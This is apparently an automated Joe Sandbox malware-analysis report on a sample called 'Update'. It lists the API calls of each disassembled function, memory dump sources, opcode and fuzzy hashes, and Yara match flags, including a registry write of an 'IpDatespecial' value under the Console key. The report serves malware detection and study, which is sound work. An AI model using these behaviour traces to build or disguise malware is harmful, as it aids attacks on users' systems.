                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                • String ID:
                                                                                                • API String ID: 3058130114-0
                                                                                                • Opcode ID: 853d5b1320306e17b703e95c8ac024245033e86184f22939640f8c8fa98ad183
                                                                                                • Instruction ID: 1270f246d1c769ccb8b2cad65aac922ea610c0a1e8ef2465b2a7bf9f155eae9f
                                                                                                • Opcode Fuzzy Hash: 853d5b1320306e17b703e95c8ac024245033e86184f22939640f8c8fa98ad183
                                                                                                • Instruction Fuzzy Hash: B851A2786047019FEB60EF65C984BAAB7E8FF44718F144959EA6ADB380EB31F440CB51
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6CA9DA47
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA9DA4F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6CA9DAD8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA9DB03
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6CA9DB58
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: e7b6d18af818ad00caccf0a2c676cf3d1bf75309cde6fcc3920efed68a9ec567
                                                                                                • Instruction ID: c28c5bc37580f2fe66598c6c34047c8812c36f9a549ec23460275c4ceff0374a
                                                                                                • Opcode Fuzzy Hash: e7b6d18af818ad00caccf0a2c676cf3d1bf75309cde6fcc3920efed68a9ec567
                                                                                                • Instruction Fuzzy Hash: 4041C234E102199BCF00DF68C981ADEBBF5AF45318F148155E814ABB51D731DADACB94
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,9AFB9AC3,?,6CAACD1F,6CAA5151,?,00000000), ref: 6CAACCD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: d19c579314896d083223fccecf06474696f98c40b998bca872fe98558f9f1c3f
                                                                                                • Instruction ID: 4670f97e56491f4d885b6f141f7139038433fee77460d2434749c6e91e31bc6f
                                                                                                • Opcode Fuzzy Hash: d19c579314896d083223fccecf06474696f98c40b998bca872fe98558f9f1c3f
                                                                                                • Instruction Fuzzy Hash: 0521F331B01621FBEB16BFA9CC44A5A37789B4276CF284611E915A7680D732EA83C7D0
                                                                                                APIs
                                                                                                • __FF_MSGBANNER.LIBCMT ref: 03808DB5
                                                                                                  • Part of subcall function 03801EE8: __NMSG_WRITE.LIBCMT ref: 03801F0F
                                                                                                  • Part of subcall function 03801EE8: __NMSG_WRITE.LIBCMT ref: 03801F19
                                                                                                • __NMSG_WRITE.LIBCMT ref: 03808DBC
                                                                                                  • Part of subcall function 03801D39: GetModuleFileNameW.KERNEL32(00000000,0381FF62,00000104,00000000,00000000,?), ref: 03801DD5
                                                                                                  • Part of subcall function 03801D39: __invoke_watson.LIBCMT ref: 03801DFE
                                                                                                  • Part of subcall function 03801D39: _wcslen.LIBCMT ref: 03801E04
                                                                                                  • Part of subcall function 03801D39: _wcslen.LIBCMT ref: 03801E11
                                                                                                  • Part of subcall function 03801A78: ___crtCorExitProcess.LIBCMT ref: 03801A80
                                                                                                  • Part of subcall function 03801A78: ExitProcess.KERNEL32 ref: 03801A89
                                                                                                • __malloc_crt.LIBCMT ref: 03808DE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess_wcslen$FileModuleName___crt__invoke_watson__malloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2521357910-0
                                                                                                • Opcode ID: 2e336b46813bb123bd8740105b134368aeae54145c39dfbeea9f3ee508290865
                                                                                                • Instruction ID: 6414fbe71675de7d266c45f2cd3b737dc44c7f2616b0df9b1c5302bf5b633bb2
                                                                                                • Opcode Fuzzy Hash: 2e336b46813bb123bd8740105b134368aeae54145c39dfbeea9f3ee508290865
                                                                                                • Instruction Fuzzy Hash: 8B01C07A644306AEDBA0FFF8AC4862E33A46B41764F2004E8D251EF2D0CE7009C19B13
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6BD
                                                                                                • CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6D7
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FE6F2
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000), ref: 037FE6FF
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 037FE70A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FE711
                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 037FE71E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 4202892810-0
                                                                                                • Opcode ID: f38016828063364bcf2157de7e30f4816bf04d095319e4b14374bd860501b74e
                                                                                                • Instruction ID: 216e6d3efdea405e874726c962697e4a31406f1050e9e6f5e051c49ceb4fa21e
                                                                                                • Opcode Fuzzy Hash: f38016828063364bcf2157de7e30f4816bf04d095319e4b14374bd860501b74e
                                                                                                • Instruction Fuzzy Hash: 1A016871281614BBE324F7B4AC0EF5E7B6CEB09B25F104784F725E61C4D7B469108765
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03816318,00000008,03803E36,00000000,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06), ref: 03803D3F
                                                                                                • __lock.LIBCMT ref: 03803D73
                                                                                                  • Part of subcall function 03808E5B: __amsg_exit.LIBCMT ref: 03808E7D
                                                                                                  • Part of subcall function 03808E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000,?,038010F0,00000000,03816278,00000008,03801155,?), ref: 03808E85
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 03803D80
                                                                                                • __lock.LIBCMT ref: 03803D94
                                                                                                • ___addlocaleref.LIBCMT ref: 03803DB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
                                                                                                • String ID: KERNEL32.DLL
                                                                                                • API String ID: 3732598078-2576044830
                                                                                                • Opcode ID: 93791126f968966b14353c3482e58bbc7ba4a885066364bc1c8f6a376c32c905
                                                                                                • Instruction ID: 4c72211985ee38a2dd734026de5b0e7ade126f1b6f115bdc652f1441ea171e3d
                                                                                                • Opcode Fuzzy Hash: 93791126f968966b14353c3482e58bbc7ba4a885066364bc1c8f6a376c32c905
                                                                                                • Instruction Fuzzy Hash: 4E013C79440B00EAD7A0EFA99804749FBE4AF80320F104989D9AA9B2D0CBB4A644CB16
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,10017C00,00000008,100098EA,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C), ref: 100097F3
                                                                                                • __lock.LIBCMT ref: 10009827
                                                                                                  • Part of subcall function 1000C144: __mtinitlocknum.LIBCMT ref: 1000C15A
                                                                                                  • Part of subcall function 1000C144: __amsg_exit.LIBCMT ref: 1000C166
                                                                                                  • Part of subcall function 1000C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,100099BA,0000000D,10017C28,00000008,10009AB1,00000000,?,10007711,00000000,10017B60,00000008,10007776,?), ref: 1000C16E
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 10009834
                                                                                                • __lock.LIBCMT ref: 10009848
                                                                                                • ___addlocaleref.LIBCMT ref: 10009866
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID: KERNEL32.DLL
                                                                                                • API String ID: 637971194-2576044830
                                                                                                • Opcode ID: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                                                • Instruction ID: 89763b3cff33ace5d26e8772c174daa1abf762224351bfae7625883661725aa5
                                                                                                • Opcode Fuzzy Hash: 2fd8a646381f8c1273ec5aa8b514110e131a74dbccaeb09b5e4df53804c3848b
                                                                                                • Instruction Fuzzy Hash: 1A016D75804B00DFE320DF69C84574ABBE0EF41361F14890EE49A9B3A5CBB4F680CB55
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 037FB7A7
                                                                                                • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 037FB7B7
                                                                                                • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 037FB7CE
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000004), ref: 037FB7D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Value$CloseDeleteOpen
                                                                                                • String ID: Console$IpDatespecial
                                                                                                • API String ID: 3183427449-1840232981
                                                                                                • Opcode ID: c0fccccb02fcedc2a4403f871292bf1c046568af7a48fd96d0909da7018dbd0f
                                                                                                • Instruction ID: 75e59a549e3fd198062e1a7bdb3ea4fd3e144cf6f500f1e8483cf4c6f3d02721
                                                                                                • Opcode Fuzzy Hash: c0fccccb02fcedc2a4403f871292bf1c046568af7a48fd96d0909da7018dbd0f
                                                                                                • Instruction Fuzzy Hash: B3F08C75244340EFE324A7A0AC4AF5AB768FB89B11F504A8DFA84A6281C6A4A111C666
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0381031D
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                • __getptd.LIBCMT ref: 0381032E
                                                                                                • __getptd.LIBCMT ref: 0381033C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 803148776-2671469338
                                                                                                • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                • Instruction ID: 9deb6596afb51e8f787541e6357bda4494352e11926b5f623d318ee4b1874125
                                                                                                • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                • Instruction Fuzzy Hash: C3E01AB8500208CFCB20EBECC88AB6836DDBB88714F5905E1D40CCF662C778E4E08993
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 10013412
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                • __getptd.LIBCMT ref: 10013423
                                                                                                • __getptd.LIBCMT ref: 10013431
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 803148776-2671469338
                                                                                                • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                • Instruction ID: 786e14bf1501c0e18a8257e8a75f03574bdb54e2dd84c562cebc2d2ff3df38bd
                                                                                                • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                • Instruction Fuzzy Hash: 86E01A345042488FE720DB68C04AB5933E4FBC8294F5680A5F41ECF226C738FD908942
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 037F9C3F
                                                                                                  • Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
                                                                                                  • Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
                                                                                                  • Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8
                                                                                                • _free.LIBCMT ref: 037F9C63
                                                                                                • _memset.LIBCMT ref: 037F9CBB
                                                                                                  • Part of subcall function 037FA610: GetObjectW.GDI32(?,00000054,?), ref: 037FA62E
                                                                                                • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 037F9CD3
                                                                                                • _free.LIBCMT ref: 037F9CE4
                                                                                                • _free.LIBCMT ref: 037F9D23
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1756752955-0
                                                                                                • Opcode ID: 7ada5016fd7dd0244fd30d405748e4ab146a64c65fb02b106da8da69d8b7525a
                                                                                                • Instruction ID: 051167af1af71b7720e848299c41f8d1e12e711811623c3edd811d7e7569f858
                                                                                                • Opcode Fuzzy Hash: 7ada5016fd7dd0244fd30d405748e4ab146a64c65fb02b106da8da69d8b7525a
                                                                                                • Instruction Fuzzy Hash: 02318FB26003056FE710DE7AD884B56B7D8BF4A314F04853ADB099B740EBB1E454CBA1
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(000002FF), ref: 037F50CA
                                                                                                • WSASetLastError.WS2_32(0000139F), ref: 037F50E2
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037F50EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                • String ID:
                                                                                                • API String ID: 4082018349-0
                                                                                                • Opcode ID: c5e129316422075b5ea2f6e5309d708dd7e6fb5c90b165c30c305f301ca7c117
                                                                                                • Instruction ID: 0ecf684ce999f9e3127fc13b91139350b11270632c6b1c462f246df854fa3812
                                                                                                • Opcode Fuzzy Hash: c5e129316422075b5ea2f6e5309d708dd7e6fb5c90b165c30c305f301ca7c117
                                                                                                • Instruction Fuzzy Hash: 77318E766047489FD714DF65D949B6AB3ACFB49720F004A5EEA15C7780E736A810CB50
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,4B556414,?,?,10014228,000000FF), ref: 100050AA
                                                                                                • WSASetLastError.WS2_32(0000139F,?,?,?,?,4B556414,?,?,10014228,000000FF), ref: 100050C2
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 100050CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                • String ID:
                                                                                                • API String ID: 4082018349-0
                                                                                                • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                                • Instruction ID: 94e9e828bd4e4f39969e9d0b2c4f8dfc3b4d38cc2041e0ad1404f002baf5890c
                                                                                                • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                                • Instruction Fuzzy Hash: DE316D76A04644EBE711CF95DD86BABB3E8FB48752F008A1AF906C7645D776E800CB90
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                                                • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                                                • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                                                • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                                                • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleObjectSingleSleepWait
                                                                                                • String ID:
                                                                                                • API String ID: 640476663-0
                                                                                                • Opcode ID: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                                                • Instruction ID: db8a483aedded49ec56de4fe6a38a5b8db7edc3383aabb911f028b40afcbc516
                                                                                                • Opcode Fuzzy Hash: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                                                • Instruction Fuzzy Hash: E6216AB61046548FD750EBA8CC8498BF3F9FF893507198B08E5948B395CA34DC05CBA4
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,6CAA93A7,6CAA9BB5,?,?,?,?,6CA9D5F2,?,?,?,?,?,00000000,00000000), ref: 6CAA93BE
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CAA93CC
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CAA93E5
                                                                                                • SetLastError.KERNEL32(00000000,?,?,6CA9D5F2,?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6CAA9437
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 6a544477970cb38b19743ab2593f8220c0b9ce95d18487d5a845e957388af98e
                                                                                                • Instruction ID: 9aa15b8536096b382b2538a7885e3ef592cd8a0961d18fc3a9a1bbb1a7c43e7d
                                                                                                • Opcode Fuzzy Hash: 6a544477970cb38b19743ab2593f8220c0b9ce95d18487d5a845e957388af98e
                                                                                                • Instruction Fuzzy Hash: AC01B93230A7169FAA1815F96DC95473BFCEB0227C724432AF510579D0EF13898B8250
                                                                                                APIs
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6CAA9DC2
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6CAAA03B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallUnexpectedtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2673424686-393685449
                                                                                                • Opcode ID: e93e77da4374859ac1a99c42dcc02faad5b10c4b67f4311b2dfc08731f85731b
                                                                                                • Instruction ID: 4718e08aa8259649cf6337fc789f22bb97077d4554eea67b1982888f8c09fa9a
                                                                                                • Opcode Fuzzy Hash: e93e77da4374859ac1a99c42dcc02faad5b10c4b67f4311b2dfc08731f85731b
                                                                                                • Instruction Fuzzy Hash: 47B17B71800209EFCF05CFF6CA809DEB7B5BF08309B18415AE8156BA15D736DADACB91
                                                                                                APIs
                                                                                                • __CreateFrameInfo.LIBCMT ref: 038105D6
                                                                                                  • Part of subcall function 038100B7: __getptd.LIBCMT ref: 038100C5
                                                                                                  • Part of subcall function 038100B7: __getptd.LIBCMT ref: 038100D3
                                                                                                • __getptd.LIBCMT ref: 038105E0
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                • __getptd.LIBCMT ref: 038105EE
                                                                                                • __getptd.LIBCMT ref: 038105FC
                                                                                                • __getptd.LIBCMT ref: 03810607
                                                                                                • _CallCatchBlock2.LIBCMT ref: 0381062D
                                                                                                  • Part of subcall function 0381015C: __CallSettingFrame@12.LIBCMT ref: 038101A8
                                                                                                  • Part of subcall function 038106D4: __getptd.LIBCMT ref: 038106E3
                                                                                                  • Part of subcall function 038106D4: __getptd.LIBCMT ref: 038106F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                • String ID:
